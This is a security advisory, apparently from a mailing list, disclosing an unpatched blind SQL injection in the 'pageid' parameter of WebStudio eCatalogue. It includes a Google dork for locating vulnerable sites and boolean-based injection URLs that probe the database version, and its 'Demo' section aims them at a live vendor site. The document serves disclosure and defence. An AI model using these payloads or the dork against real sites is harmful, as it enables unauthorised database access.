Application:  WebStudio eCatalogue

Vendor Name: BDigital Media Ltd

Vendors Url:  http://www.bdigital.biz

Bug Type:     WebStudio eCatalogue (pageid) Blind SQL Injection
Vulnerability

Exploitation: Remote

Severity: Critical

Solution Status: Unpatched 

Google Dork:  "Powered by WebStudio" eCatalogue

 

Description:

 

WebStudio eCatalogue is prone to an SQL-injection vulnerability because it
fails to sufficiently sanitize user-supplied data before using it in an SQL
query.

Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying
database.

 

PoC:

 

http://localhost/index.php?pageid=1+and+1=1 ( TRUE  )

 

http://localhost/index.php?pageid=1+and+1=2 ( FALSE )

 

Exploit:

 

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )

 

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )

 

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )

 

Demo:

 

http://www.webstudioecatalogue.com/index.php?pageid=1+and+substring(@@versio
n,1,1)=3 ( TRUE  )

 

http://www.webstudioecatalogue.com/index.php?pageid=1+and+substring(@@versio
n,1,1)=4 ( FALSE )

 

http://www.webstudioecatalogue.com/index.php?pageid=1+and+substring(@@versio
n,1,1)=5 ( FALSE )

 

 

Solution:

 

There was no vendor-supplied solution at the time of entry.

 

Edit source code manually to ensure user-supplied input is correctly
sanitised.

 

 

Credits:

 

Charalambous Glafkos

Email:  glafkos (at) astalavista (dot) com

___________________________________________

ASTALAVISTA - the hacking & security community

www.astalavista.com

www.astalavista.net

 

Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
 <http://www.astalavista.com/> www.astalavista.com
 <http://www.astalavista.net/> www.astalavista.net